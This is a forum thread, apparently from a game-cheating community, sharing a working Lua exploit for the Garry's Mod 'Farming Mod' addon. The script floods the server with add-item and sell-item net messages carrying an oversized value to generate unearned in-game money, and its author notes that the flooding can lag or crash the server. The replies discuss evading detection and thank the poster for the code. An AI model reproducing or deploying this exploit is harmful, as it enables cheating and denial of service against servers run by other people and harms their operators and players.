Garry's Mod

[MONEY EXPLOIT] Farming Mod

Submitted by novaninnaaa, , Thread ID: 161038

Thread Closed
04-03-2020, 11:24 AM
Someone posted a Fishing Mod money exploit a while back and said it was interchangeable with Farming Mod but it was a little more tricky than that because the addons net.WriteTables are formatted differently. If you find a server that doesn't have this patched I'd be interested in knowing!

Code:
concommand.Add( "_farmingmoney", function()
farmingmoney()
end )

function farmingmoney()
for i=1,500 do -- sends the netmessage x amount of times, depending on how large, it could lag/crash a server
net.Start("FARMINGMOD_ADDITEM")
net.WriteTable({name="Peach"}) -- you can change this to any other fruit/veggie but on most servers this is the best
net.WriteInt(1000000000, 16) -- couldn't get the number to go higher than this
net.SendToServer()

net.Start("FARMINGMOD_SELLITEM")
net.WriteTable({name="Peach"}) -- you can change this to any other fruit/veggie but on most servers this is the best
net.WriteInt(1000000000, 16) -- couldn't get the number to go higher than this
net.SendToServer()
end
end

RE: [MONEY EXPLOIT] Farming Mod

What would happen when this is detected? Won't they start banning people doing this? Also, why write such a big int (1000000000)? A simple check for if it's larger than 1 would result in you getting caught.

OP
05-03-2020, 12:47 AM
Zero03 Wrote:
What would happen when this is detected? Won't they start banning people doing this? Also, why write such a big int (1000000000)? A simple check for if it's larger than 1 would result in you getting caught.

You're going to get banned or caught on any server with a brain using money exploits. You can change 1000000000 to anything you want, it's just what I was using for a particular server.

Which servers use these netmessages or which addon is it from?

Thank you, I really thought that I could not find it .........

This still works? Cuz like that's an old version nah?

Thanks for sharing, I will keep it for myself for further actions.

thank you for providing us with such code scripts, really appreciate this